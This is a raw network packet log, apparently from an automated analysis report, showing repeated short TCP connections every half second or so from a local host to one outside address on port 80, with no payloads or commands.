Nov 25, 2021 10:55:04.067032099 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.067086935 CET	50670	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.100511074 CET	80	50670	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.502604961 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.536717892 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.536890984 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.538402081 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.572491884 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.572664022 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.606730938 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.624690056 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.624744892 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:04.624897003 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.624958992 CET	50671	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:04.659099102 CET	80	50671	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.016922951 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.051014900 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.051285028 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.052794933 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.086854935 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.087060928 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.121083021 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.137243986 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.137296915 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.137506008 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.137564898 CET	50672	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.171540022 CET	80	50672	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.533308983 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.567388058 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.567662954 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.569176912 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.603187084 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.603360891 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.637370110 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.660506010 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.660561085 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:05.660854101 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.660938025 CET	50673	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:05.695142031 CET	80	50673	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.046968937 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.081095934 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.081281900 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.082835913 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.116807938 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.117062092 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.151149988 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.169486046 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.169540882 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.169688940 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.169743061 CET	50674	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.204121113 CET	80	50674	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.563596964 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.597038984 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.597291946 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.598788977 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.632131100 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.632414103 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.665746927 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.694299936 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.694349051 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:06.694523096 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.694575071 CET	50675	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:06.727926016 CET	80	50675	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.017895937 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.051309109 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.051529884 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.053124905 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.086508036 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.086771011 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.120060921 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.137895107 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.137938976 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.138047934 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.138096094 CET	50676	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.171478033 CET	80	50676	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.521496058 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.555638075 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.555876970 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.557349920 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.591512918 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.591834068 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.626122952 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.641962051 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.642031908 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:07.642312050 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.642407894 CET	50677	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:07.676569939 CET	80	50677	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.030900002 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.064171076 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.064403057 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.069897890 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.102932930 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.103163004 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.136193037 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.153906107 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.153913975 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.154098034 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.154180050 CET	50678	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.187309027 CET	80	50678	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.500072956 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.533916950 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.534074068 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.535660028 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.569680929 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.569844961 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.603724003 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.619822979 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.619862080 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.620001078 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.620043993 CET	50679	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.653966904 CET	80	50679	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.957257032 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.991396904 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:08.991648912 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:08.993230104 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.027345896 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.027662039 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.061975002 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.086581945 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.086644888 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.086793900 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.086863041 CET	50680	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.121073961 CET	80	50680	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.465625048 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.499241114 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.499516010 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.501049995 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.534606934 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.534815073 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.568141937 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.590336084 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.590384007 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.590594053 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.590642929 CET	50681	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:09.624003887 CET	80	50681	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:09.991952896 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.026225090 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.026341915 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.027945995 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.061897993 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.062144995 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.096112967 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.113701105 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.113775969 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.114003897 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.114058971 CET	50682	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.148119926 CET	80	50682	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.464663982 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.498099089 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.498296976 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.499800920 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.533519030 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.533844948 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.567327023 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.597724915 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.597776890 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.597966909 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.598020077 CET	50683	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:10.631603003 CET	80	50683	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:10.991555929 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.024961948 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.025269032 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.026772976 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.060276985 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.060522079 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.093931913 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.110959053 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.111011028 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.111203909 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.111259937 CET	50684	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.144629955 CET	80	50684	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.504265070 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.538382053 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.538710117 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.540230036 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.574290991 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.574536085 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.608670950 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.624141932 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.624208927 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:11.624490023 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.624587059 CET	50685	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:11.658941031 CET	80	50685	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.024445057 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.058468103 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.058645964 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.060169935 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.094204903 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.094419003 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.128556967 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.146275997 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.146342039 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.146522999 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.146605015 CET	50686	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.180946112 CET	80	50686	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.528636932 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.562762976 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.562969923 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.564542055 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.598473072 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.598675966 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.632678032 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.648529053 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.648577929 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:12.648762941 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.648809910 CET	50687	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:12.682710886 CET	80	50687	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.038765907 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.072159052 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.072382927 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.073925972 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.107363939 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.107731104 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.141045094 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.157313108 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.157371998 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.157536030 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.157593966 CET	50688	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.190913916 CET	80	50688	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.552615881 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.586752892 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.587059975 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.588603973 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.622591019 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.622864008 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.656934977 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.673353910 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.673415899 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:13.673562050 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.673635960 CET	50689	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:13.707803011 CET	80	50689	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.066472054 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.099929094 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.100171089 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.101732016 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.135240078 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.135425091 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.169003010 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.191421986 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.191484928 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.191776037 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.191874027 CET	50690	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.225563049 CET	80	50690	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.583476067 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.617610931 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.617819071 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.619405031 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.653106928 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.653337955 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.687180042 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.703444958 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.703501940 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:14.703787088 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.703870058 CET	50691	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:14.738212109 CET	80	50691	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.084052086 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.117501020 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.117840052 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.119360924 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.152729988 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.152946949 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.186196089 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.205034971 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.205111027 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.205271006 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.205315113 CET	50692	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.238689899 CET	80	50692	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.571502924 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.605411053 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.605634928 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.607177973 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.641103983 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.641587973 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.675570011 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.692130089 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.692212105 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:15.692413092 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.692471981 CET	50693	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:15.726486921 CET	80	50693	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.069888115 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.103948116 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.104094982 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.105694056 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.139641047 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.140073061 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.174060106 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.196391106 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.196439028 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.196588993 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.196635008 CET	50694	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.230973959 CET	80	50694	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.588460922 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.621784925 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.622066975 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.623550892 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.656970024 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.657157898 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.690619946 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.709078074 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.709134102 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:16.709275961 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.709330082 CET	50695	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:16.742953062 CET	80	50695	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.096316099 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.129796982 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.130110979 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.136322021 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.169620991 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.169868946 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.203555107 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.227396965 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.227461100 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.227617979 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.227684021 CET	50696	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.261306047 CET	80	50696	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.625133991 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.659346104 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.659574986 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.661093950 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.695080996 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.695328951 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.729376078 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.746172905 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.746221066 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:17.746392965 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.746440887 CET	50697	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:17.780703068 CET	80	50697	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.132131100 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.165339947 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.165525913 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.167114019 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.200758934 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.201083899 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.234679937 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.251601934 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.251666069 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.251818895 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.251883984 CET	50698	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:18.285598040 CET	80	50698	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:18.614609003 CET	50699	80	192.168.11.20	176.223.209.128
